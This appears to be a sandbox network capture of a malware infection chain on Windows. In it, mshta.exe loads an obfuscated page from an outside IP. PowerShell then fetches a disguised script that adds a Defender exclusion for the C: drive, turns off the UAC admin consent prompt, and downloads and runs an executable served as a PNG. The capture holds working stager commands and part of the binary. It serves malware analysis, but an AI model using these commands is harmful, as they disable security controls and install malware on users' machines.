                                                                  Dec 18, 2024 13:49:11.657890081 CET224INData Raw: 74 20 61 6c 6c 20 74 68 65 72 65 20 69 73 20 74 6f 20 69 74 2e 20 54 68 65 72 65 20 69 73 20 61 6e 6f 74 68 65 72 20 6d 65 74 68 6f 64 20 6f 66 20 64 75 70 6c 69 63 61 74 65 20 64 65 74 65 63 74 69 6f 6e 20 74 68 61 74 20 66 65 77 20 70 65 6f 70
                                                                  Data Ascii: t all there is to it. There is another method of duplicate detection that few people know about. This method has long been used in filmmaking and most popular platforms - it's watermarks.'TikTok, as well as other platforms
                                                                  Dec 18, 2024 13:49:11.657912016 CET1236INData Raw: 2c 20 69 73 20 61 63 74 69 76 65 6c 79 20 66 69 67 68 74 69 6e 67 20 70 6c 61 67 69 61 72 69 73 6d 2c 20 69 6d 70 72 6f 76 69 6e 67 20 69 74 73 20 61 6c 67 6f 72 69 74 68 6d 73 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 41 49 20 74 6f 20 70 72 65
                                                                  Data Ascii: , is actively fighting plagiarism, improving its algorithms and training AI to prevent content re-posting, both from other platforms and within TikTok itself.'First of all, when a video is uploaded to TikTok, it is instantly processed by (AI
                                                                  Dec 18, 2024 13:49:11.657923937 CET1236INData Raw: 54 69 6b 54 6f 6b 2c 20 69 74 20 69 73 20 69 6e 73 74 61 6e 74 6c 79 20 70 72 6f 63 65 73 73 65 64 20 62 79 20 28 41 49 29 20 74 68 61 74 20 69 64 65 6e 74 69 66 69 65 73 20 6f 62 6a 65 63 74 73 20 69 6e 20 74 68 65 20 76 69 64 65 6f 2c 20 63 61
                                                                  Data Ascii: TikTok, it is instantly processed by (AI) that identifies objects in the video, categorizes it and looks for violations. The video is then compressed, parameters and metadata are changed. If you download and upload that video again, TT immedia
                                                                  Dec 18, 2024 13:49:11.657939911 CET448INData Raw: 68 61 74 20 61 6d 20 49 20 64 6f 69 6e 67 20 77 72 6f 6e 67 3f 20 57 68 79 20 69 73 20 74 68 69 73 20 68 61 70 70 65 6e 69 6e 67 3f 0d 0a 27 49 6d 61 67 69 6e 65 20 69 66 20 65 61 63 68 20 72 65 75 70 6c 6f 61 64 65 64 20 76 69 64 65 6f 20 67 61
                                                                  Data Ascii: hat am I doing wrong? Why is this happening?'Imagine if each reuploaded video gained the same number of views as the original and was uploaded until users simply get bored. In such a case TikTok would be overflowing with duplicates and traff
                                                                  Dec 18, 2024 13:49:11.658018112 CET1236INData Raw: 6f 6e 74 65 6e 74 20 72 65 2d 70 6f 73 74 69 6e 67 2c 20 62 6f 74 68 20 66 72 6f 6d 20 6f 74 68 65 72 20 70 6c 61 74 66 6f 72 6d 73 20 61 6e 64 20 77 69 74 68 69 6e 20 54 69 6b 54 6f 6b 20 69 74 73 65 6c 66 2e 0d 0a 27 46 69 72 73 74 20 6f 66 20
                                                                  Data Ascii: ontent re-posting, both from other platforms and within TikTok itself.'First of all, when a video is uploaded to TikTok, it is instantly processed by (AI) that identifies objects in the video, categorizes it and looks for violations. The vid
                                                                  Dec 18, 2024 13:49:11.658030033 CET1236INData Raw: 75 65 73 74 69 6f 6e 3a 0d 0a 27 20 20 20 20 49 20 72 65 75 70 6c 6f 61 64 20 76 69 64 65 6f 73 20 74 68 61 74 20 68 61 76 65 20 68 61 64 20 73 65 76 65 72 61 6c 20 6d 69 6c 6c 69 6f 6e 20 76 69 65 77 73 2c 20 62 75 74 20 49 20 68 61 76 65 20 74
                                                                  Data Ascii: uestion:' I reupload videos that have had several million views, but I have them gaining less than a thousand, what am I doing wrong? Why is this happening?'Imagine if each reuploaded video gained the same number of views as the origina
                                                                  Dec 18, 2024 13:49:11.658042908 CET1236INData Raw: 61 64 64 69 74 69 6f 6e 20 6f 66 20 61 20 6c 6f 67 6f 20 74 6f 20 61 20 76 69 64 65 6f 20 74 68 61 74 20 69 73 20 63 6c 65 61 72 6c 79 20 76 69 73 69 62 6c 65 2e 0d 0a 27 54 68 65 72 65 20 61 72 65 20 61 6c 73 6f 20 64 69 67 69 74 61 6c 20 77 61
                                                                  Data Ascii: addition of a logo to a video that is clearly visible.'There are also digital watermarks that are invisible to the human eye.'These are stitched right into the video signal and encrypted. Thus, every video uploaded to Tik'Translated with
                                                                  Dec 18, 2024 13:49:11.658282995 CET1236INData Raw: 65 72 73 20 77 6f 75 6c 64 20 62 65 20 73 77 69 6d 6d 69 6e 67 20 69 6e 20 76 69 65 77 73 2e 20 42 79 20 74 68 65 20 77 61 79 2c 20 61 20 63 6f 75 70 6c 65 20 79 65 61 72 73 20 61 67 6f 20 69 74 20 77 61 73 20 6c 69 6b 65 20 74 68 61 74 2e 0d 0a
                                                                  Data Ascii: ers would be swimming in views. By the way, a couple years ago it was like that.'TikTok, as well as other platforms, is actively fighting plagiarism, improving its algorithms and training AI to prevent content re-posting, both from other pla
                                                                  Dec 18, 2024 13:49:11.665781975 CET1236INData Raw: 64 2c 20 70 61 72 61 6d 65 74 65 72 73 20 61 6e 64 20 6d 65 74 61 64 61 74 61 20 61 72 65 20 63 68 61 6e 67 65 64 2e 20 49 66 20 79 6f 75 20 64 6f 77 6e 6c 6f 61 64 20 61 6e 64 20 75 70 6c 6f 61 64 20 74 68 61 74 20 76 69 64 65 6f 20 61 67 61 69
                                                                  Data Ascii: d, parameters and metadata are changed. If you download and upload that video again, TT immediately recognizes it and your chances of getting recommended go down to zero.'Let's look at the most popular question:' I reupload videos that
                                                                  Dec 18, 2024 13:49:11.665918112 CET1236INData Raw: 69 73 20 74 6f 20 69 74 2e 20 54 68 65 72 65 20 69 73 20 61 6e 6f 74 68 65 72 20 6d 65 74 68 6f 64 20 6f 66 20 64 75 70 6c 69 63 61 74 65 20 64 65 74 65 63 74 69 6f 6e 20 74 68 61 74 20 66 65 77 20 70 65 6f 70 6c 65 20 6b 6e 6f 77 20 61 62 6f 75
                                                                  Data Ascii: is to it. There is another method of duplicate detection that few people know about. This method has long been used in filmmaking and most popular platforms - it's watermarks.'Visible watermarks are the addition of a logo to a video that is


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.649726176.113.115.178807444C:\Windows\System32\mshta.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 18, 2024 13:49:14.653872967 CET333OUTGET /Windows-Update HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Language: en-CH
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: 176.113.115.178
                                                                  Connection: Keep-Alive
                                                                  Dec 18, 2024 13:49:16.024590969 CET371INHTTP/1.1 301 Moved Permanently
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Location: http://176.113.115.178/Windows-Update/
                                                                  Server: Microsoft-IIS/10.0
                                                                  Date: Wed, 18 Dec 2024 12:49:15 GMT
                                                                  Content-Length: 161
                                                                  Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 31 37 36 2e 31 31 33 2e 31 31 35 2e 31 37 38 2f 57 69 6e 64 6f 77 73 2d 55 70 64 61 74 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://176.113.115.178/Windows-Update/">here</a></body>
                                                                  Dec 18, 2024 13:49:16.031613111 CET334OUTGET /Windows-Update/ HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Language: en-CH
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: 176.113.115.178
                                                                  Connection: Keep-Alive
                                                                  Dec 18, 2024 13:49:16.493833065 CET1236INHTTP/1.1 200 OK
                                                                  Content-Type: text/html
                                                                  Last-Modified: Thu, 21 Nov 2024 18:37:41 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "19c58d72443cdb1:0"
                                                                  Server: Microsoft-IIS/10.0
                                                                  Date: Wed, 18 Dec 2024 12:49:15 GMT
                                                                  Content-Length: 10664
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 27 47 45 4e 45 52 41 54 4f 52 27 20 43 6f 6e 74 65 6e 74 3d 27 54 68 65 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 66 20 74 68 69 73 20 70 61 67 65 20 69 73 20 65 6e 63 72 79 70 74 65 64 20 77 69 74 68 20 48 54 4d 4c 20 47 75 61 72 64 69 61 6e 2c 20 20 74 68 65 20 77 6f 72 6c 64 27 73 20 73 74 61 6e 64 61 72 74 20 66 6f 72 20 77 65 62 73 69 74 65 20 70 72 6f 74 65 63 74 69 6f 6e 2e 20 56 69 73 69 74 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 6f 74 77 61 72 65 2e 63 6f 6d 20 66 6f 72 20 64 65 74 61 69 6c 73 27 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 65 78 70 69 72 65 73 27 20 63 6f 6e 74 65 6e 74 3d 27 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 [TRUNCATED]
                                                                  Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';pHcl5jBGPFb='kmOsd6OpxRj6';</script><script>la0Q6t4=new Array();la0Q6t4[0]='\151\130%34\150\101p%38%35%41S%55O';o4Jfj0q=new Array();o4Jfj0q[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd">\r\n<~W x~~/="~=~?~A~C~E~G~I/19~{~V~
                                                                  Dec 18, 2024 13:49:16.493858099 CET1236INData Raw: 0b 7f 6c 7e 66 7e 68 7e 6a 7f 65 7f 61 7f 64 7f 3e 7f 3c 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 08 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 25 7f 36 7f 31 7f 72 7f 25 7f 32 7f 30 7f 71
                                                                  Data Ascii: l~f~h~jead><script>ev~6(une}ape(\'%76%61r%20q\\171%37}+D}#}-2}-3Bq}9}+8}.%53}4}\'62}\'51ng}#E}6}A2omC}D0}\'41}M%43o}}@145}#}:3}*3}>2C}+}d0}#}8}4}K}D7}W28
                                                                  Dec 18, 2024 13:49:16.493870020 CET448INData Raw: 7c 32 79 5c 72 7c 1b 7c 3a 7f 34 79 1c 7f 31 7f 32 7c 4a 7f 4c 7d 61 7a 68 79 3f 7f 33 7d 7d 79 12 7b 1b 79 57 7a 3d 7b 19 7d 7a 7c 05 7c 7c 7c 15 79 7a 7f 37 7c 7d 7b 61 7f 5c 27 7f 29 7f 29 7f 3c 7f 2f 7d 08 7d 5c 6e 7d 0c 7d 06 78 04 7d 0b 7d
                                                                  Data Ascii: |2y\r||:4y12|JL}azhy?3}}y{yWz={}z||||yz7|}{a\'))</}}\n}}x}}\rdozo|Wyza~D}\nt}"<tab{/ wi~ch=\'10}k\' zDrdzx0\'}~[x-dx%gcol~Hx#x"zx"x$~6ign = \'c|Xxrx,<zyza styxxxKt-f
                                                                  Dec 18, 2024 13:49:16.494033098 CET1236INData Raw: 62 7f 79 7f 20 7f 3c 7f 62 7d 06 78 53 78 4d 78 4f 78 51 78 44 78 34 77 18 7f 20 77 08 7f 46 7f 43 7f 43 77 1c 7e 23 7e 25 7f 20 7f 47 7f 75 7f 61 78 5c 27 7f 69 7e 2e 78 02 78 53 7d 06 7f 2f 77 3f 77 3d 7f 62 7f 72 77 1d 77 1f 7f 20 7f 75 7f 6c
                                                                  Data Ascii: by <b}xSxMxOxQxDx4w wFCCw~#~% Guax\'i~.xxS}/w?w=brww ul~2maxw+ox4whw/w6ew8 yw" wN~&w&exciwew2sxcJa} }';yQ5f1I1Y1vX='fu';jrsiV61='uZhQK197R6M';b1625='OTDgnHElOMDPtiyQOOOBXOSc';yQ5f1I1Y1vX+= 'nction bE
                                                                  Dec 18, 2024 13:49:16.494051933 CET1236INData Raw: 35 5c 31 33 32 5c 31 37 31 25 32 39 25 37 42 63 25 35 39 5c 31 35 32 25 33 36 25 33 32 78 5c 31 31 34 5c 31 32 30 25 33 44 25 37 37 25 33 37 6e 25 33 34 5c 31 36 37 25 33 37 48 25 35 30 5c 31 36 30 5c 31 32 35 5a 5c 31 37 31 25 37 44 25 33 42 27
                                                                  Data Ascii: 5\132\171%29%7Bc%59\152%36%32x\114\120%3D%77%37n%34\167%37H%50\160\125Z\171%7D%3B'));o4Jfj0q[0]+= 'p{/yw}wax}w| l{{kvkeepxebw%~4xxLfxYxGsvwaw<~.x0much m~He.v.w=/wXw>w^<awBxPw xxxxTx(x3~-~2~4x\\{<}wwFw
                                                                  Dec 18, 2024 13:49:16.494062901 CET1236INData Raw: 5d 77 30 7f 6e 75 33 7f 3b 73 6b 73 57 7f 3d 72 18 7f 31 72 05 7e 58 72 7a 61 7f 49 73 6b 73 69 73 57 7f 49 73 5a 73 66 7f 73 72 33 72 35 73 1c 73 7a 73 6f 73 5d 72 46 7e 2e 72 35 72 3f 72 19 78 14 72 45 72 33 72 1e 78 1f 74 0e 7e 30 7f 62 78 59
                                                                  Data Ascii: ]w0nu3;sksW=r1r~XrzaIsksisWIsZsfsr3r5sszsos]rF~.r5r?rxrEr3rxt~0bxY~1x[w-dx(nx,qtvdzxcrslsLtLntN~4 I~XrtTrqsltewxdtcv"}zzKeBez#\',\'a{tzqqqr~v,EuGqqqrqdyr6~XrC}ryxe~-y}~Wqw}qzDdyq
                                                                  Dec 18, 2024 13:49:16.494204998 CET1236INData Raw: 27 27 3b 64 35 4a 34 30 61 42 36 51 2b 3d 20 20 20 27 63 5c 31 35 30 25 36 31 72 25 34 33 5c 31 35 37 25 36 34 25 36 35 41 74 25 32 38 25 32 42 25 32 42 25 35 46 25 33 31 25 32 39 25 33 42 5c 31 35 34 25 33 37 25 35 42 5c 31 31 31 25 32 42 25 32
                                                                  Data Ascii: '';d5J40aB6Q+= 'c\150%61r%43\157%64%65At%28%2B%2B%5F%31%29%3B\154%37%5B\111%2B%2B%5D%3D\154I%2B\151l%2D%28%6C%39%3C%3C%37%29%7Dw\150ile%28%5F%31%2B%2B%3C\154%38%29%3Bva%72%20%6C%31%3D\156\145\167%20%41%72ra%79%28%29%2Cl%30%3D\156\145\167%20%
                                                                  Dec 18, 2024 13:49:16.494218111 CET1236INData Raw: 7a 75 46 75 7c 75 4a 7c 58 74 0c 77 62 7f 6c 75 36 6e 22 78 0f 6d 5c 27 7f 6e 6d 29 6e 1a 6f 7f 78 10 7e 31 75 44 7f 6e 6d 2a 74 5e 74 6c 76 55 7e 36 7a 13 70 7e 6d 37 6e 1a 6d 1f 6f 76 74 4f 6e 19 6f 60 74 54 73 20 74 28 7e 5b 7f 61 7f 46 74 4d
                                                                  Data Ascii: zuFu|uJ|Xtwblu6n"xm\'nm)nox~1uDnm*t^tlvU~6zp~m7nmovtOno`tTs t(~[aFtM1Cyzayzat3mArmowqDmEo{wS mH~-mKrm}gmOp~0mRm!vslrwwp,cmzan?n4m%t`u~vwStTv-{{ttAdyaxEyzawtnJsl[pptmj}xjqQtUcvOm3nkxR~.w2tSv\\pxs9yzamHwRlF~
                                                                  Dec 18, 2024 13:49:16.494230032 CET1236INData Raw: 22 7f 70 73 66 7f 6f 73 66 74 1d 73 66 6c 42 69 65 7f 65 73 66 73 57 7e 15 7f 3b 7e 68 77 09 7f 33 7e 70 76 51 7e 18 7d 28 7f 36 7f 2e 73 6c 7e 46 73 6c 7f 35 68 17 7f 37 7f 38 7f 2f 77 09 7e 79 76 56 7d 47 69 68 7f 5c 6e 77 09 7f 4f 68 7a 61 7f
                                                                  Data Ascii: "psfosftsflBieesfsW~;~hw3~pvQ~}(6.sl~Fsl5h78/w~yvV}Gih\nwOhza$csY}%(N%%rx-Oh0%iu{0h0woh/h0xm.Wh5r\'xxh)4xbh0|`h5%ih$w6~pI`E`X $TC|hPhRXhLFhD"k.op;hVCuRh)q|hC,h)3iRJo{{xCqh]2~ph8yzah0
                                                                  Dec 18, 2024 13:49:16.502541065 CET555INData Raw: 39 25 37 42 6c 4f 25 32 42 25 33 44 5c 31 35 34 25 33 33 25 32 38 25 36 46 25 33 34 4a 5c 31 34 36 25 36 41 25 33 30 5c 31 36 31 25 35 42 5c 31 35 31 5c 31 35 31 25 35 44 25 32 39 25 37 44 25 33 42 25 36 31 66 65 25 33 36 25 36 33 25 32 38 25 32
                                                                  Data Ascii: 9%7BlO%2B%3D\154%33%28%6F%34J\146%6A%30\161%5B\151\151%5D%29%7D%3B%61fe%36%63%28%29%3B';</script>...eShBZW3v3CtJd9m0gw--><script>lvJp2wI2S4I3RC ='MyBjVOZXpEOqCBMJsOwfUXOZOHVwWDrponkHOWOfxmlfjeLeLSNaOKVP';bEpGSgjh2L2UciWkV (d5J40aB6Q);j


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.649739176.113.115.178807616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 18, 2024 13:49:18.337718010 CET73OUTGET /FF/1.png HTTP/1.1
                                                                  Host: 176.113.115.178
                                                                  Connection: Keep-Alive
                                                                  Dec 18, 2024 13:49:19.683073044 CET676INHTTP/1.1 200 OK
                                                                  Content-Type: image/png
                                                                  Last-Modified: Thu, 21 Nov 2024 18:38:23 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "a33e7f8b443cdb1:0"
                                                                  Server: Microsoft-IIS/10.0
                                                                  Date: Wed, 18 Dec 2024 12:49:19 GMT
                                                                  Content-Length: 451
                                                                  Data Raw: 70 6f 77 65 72 73 68 65 6c 6c 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 41 41 41 63 41 41 41 3a 5c 41 41 41 22 2e 72 65 70 6c 61 63 65 28 27 41 41 41 27 2c 27 27 29 0d 0a 53 65 74 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 52 45 47 49 53 54 52 59 3a 3a 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69 63 69 65 73 5c 53 79 73 74 65 6d 20 2d 4e 61 6d 65 20 43 6f 6e 73 65 6e 74 50 72 6f 6d 70 74 42 65 68 61 76 69 6f 72 41 64 6d 69 6e 20 2d 56 61 6c 75 65 20 30 20 2d 46 6f 72 63 65 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 36 0d 0a 0d 0a 24 75 72 6c 20 3d 20 22 68 74 74 70 3a 2f 2f 31 37 36 2e 31 31 33 2e 31 31 35 2e 31 37 38 2f 46 46 2f 4d 2e 70 6e 67 22 0d 0a 24 6f 75 74 70 75 74 20 3d 20 22 24 65 6e 76 3a 41 50 50 44 41 54 41 5c 4c 42 33 31 2e 65 78 65 22 0d 0a 24 73 74 61 [TRUNCATED]
                                                                  Data Ascii: powershell Add-MpPreference -ExclusionPath "AAAcAAA:\AAA".replace('AAA','')Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Forcestart-sleep -s 6$url = "http://176.113.115.178/FF/M.png"$output = "$env:APPDATA\LB31.exe"$start_time = Get-Date$wc = New-Object System.Net.WebClient$wc.DownloadFile($url, $output)Start-Process $output


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.649822176.113.115.178807616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 18, 2024 13:49:43.266879082 CET73OUTGET /FF/M.png HTTP/1.1
                                                                  Host: 176.113.115.178
                                                                  Connection: Keep-Alive
                                                                  Dec 18, 2024 13:49:44.598474026 CET1236INHTTP/1.1 200 OK
                                                                  Content-Type: image/png
                                                                  Last-Modified: Sun, 06 Oct 2024 18:12:58 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "08ec05f1b18db1:0"
                                                                  Server: Microsoft-IIS/10.0
                                                                  Date: Wed, 18 Dec 2024 12:49:44 GMT
                                                                  Content-Length: 7679488
                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 [TRUNCATED]
                                                                  Data Ascii: MZx@xhr!L!This program cannot be run in DOS mode.$PEd^ne"xT@u`USf "`"( SR@.rsrcfSR@.idata US@ 8US@ndryujmpp!`f!S@tnyudguu*u@.pdataI,u@@
                                                                  Dec 18, 2024 13:49:44.598702908 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 18, 2024 13:49:44.598717928 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 18, 2024 13:49:44.599601030 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 18, 2024 13:49:44.599654913 CET1236INData Raw: e3 0e 40 20 e8 6a 27 5d 47 35 16 0e 80 19 c4 89 c8 dd 4f 19 f0 e5 cc 94 02 58 9c 0c 4c 24 08 0a 54 ea 10 f1 34 8b 18 fb 94 1f 20 39 40 b1 4d 6f cc a5 0a 94 a3 46 4e 17 6f 48 8c c5 ca 96 27 ea f5 43 4c 0f c0 f6 36 a3 09 41 a7 86 07 45 58 4f 50 9f
                                                                  Data Ascii: @ j']G5OXL$T4 9@MoFNoH'CL6AEXOP.5C5{BY|mCr"LcdAqlT?{E62 Gj\$Az?cPkA}4\N/2M vqD>]/DiF
                                                                  Dec 18, 2024 13:49:44.600439072 CET1236INData Raw: 3f 77 26 49 29 c7 c3 a4 1f 89 b3 4a e3 e3 f7 a0 4d 39 da 50 7f cb 4a 53 ff 17 6c 2b 25 7c 56 3a 8f 28 44 6e ee a3 50 c4 b9 3a 89 49 25 63 20 ec 30 58 98 0b 85 04 ca cd f1 21 f4 48 c2 4d e1 18 e9 5c 14 b0 c6 ec 30 e0 5b 54 22 4c 18 4a 21 81 76 c0
                                                                  Data Ascii: ?w&I)JM9PJSl+%|V:(DnP:I%c 0X!HM\0[T"LJ!v%HX3,'$0RfXP=hS'7&ZJSa1 9t#zIw E#vYi0E! $N#t B<SAYBUL (
                                                                  Dec 18, 2024 13:49:44.600452900 CET1236INData Raw: 55 14 50 fc 18 eb 32 0a 90 0f 28 43 14 f0 74 11 8b f5 3c 98 07 d1 77 ef 03 86 08 11 0a 76 e7 c3 31 42 2f 14 d0 89 93 b1 d2 09 62 25 50 b7 2c 77 68 21 8c ca 8c cf b7 f9 a1 e0 8c 90 56 72 8b fc 33 47 6e c1 36 aa 18 8c cf ec 38 18 58 06 06 85 db 74
                                                                  Data Ascii: UP2(Ct<wv1B/b%P,wh!Vr3Gn68Xt0)<NaAucP\_A(u@.fQQRyNP/M>,H+Tm@Le%PEp@L9<rs:JK!4nrxArDVhI:2
                                                                  Dec 18, 2024 13:49:44.601258993 CET1236INData Raw: 1e 4c 13 10 48 fd 5b d9 4a 38 08 78 d7 14 97 d2 a5 41 0e a5 10 ee 50 d7 d6 e0 0c 1e 83 e6 fe 9d c1 2d 62 e5 30 cc 4d 09 ff ce 48 e6 60 c1 6f e5 26 6a ed 88 13 bc 34 1c 0c 43 68 0a 6c 92 b2 a2 d7 9b 5d ec 8d cb b2 97 08 80 9a fc 4e bc 1a c1 e3 11
                                                                  Data Ascii: LH[J8xAP-b0MH`o&j4Chl]NG/T*dr=# WH" 91g@FX\$`V(DYJI\I,M:h@vMxtf!(,P0K]nq["P"h:eo18.AaQjPP@
                                                                  Dec 18, 2024 13:49:44.601313114 CET1236INData Raw: 3c 32 1d 63 25 0f 88 1f 0b d4 fe 01 75 f9 73 4b 70 98 2a 05 2e 34 de b0 7c 78 86 e3 14 b8 f1 9b 38 e2 11 2b 40 b3 ea 66 ab 1b c3 52 12 f7 eb 17 16 0a 00 32 83 e2 1f 45 32 24 0c 12 0a 3a 4a c3 cc c0 98 39 c6 74 6c ac 99 1a 45 7d 84 f4 df a9 8a c2
                                                                  Data Ascii: <2c%usKp*.4|x8+@fR2E2$:J9tlE}H7@X}(3)fDt$"%ou\Q*rF"dbS0DfdHoHK`$zy@D[tZa2!x'9I=DaYyAf7/R
                                                                  Dec 18, 2024 13:49:44.602190018 CET1236INData Raw: f2 4d 74 80 fa e8 26 17 d8 26 64 70 88 7d 28 a6 6f 5d 84 df 91 23 40 5f e8 24 01 d8 72 58 78 4b cf 12 94 29 f8 5e ca 64 10 b2 7e d1 82 12 38 41 ac 36 c5 f1 d7 4a 53 1d 41 b1 f7 a5 d7 7d 94 ca 7d 0a a4 bf 8a eb 13 4f b7 3b 2a 5b 09 c7 c0 79 5b 24
                                                                  Data Ascii: Mt&&dp}(o]#@_$rXxK)^d~8A6JSA}}O;*[y[$f=\/x:J69\#8#p"`U1P3%K("G>%V05Iaxf!H|*]["@" ~O*4)H'|oj
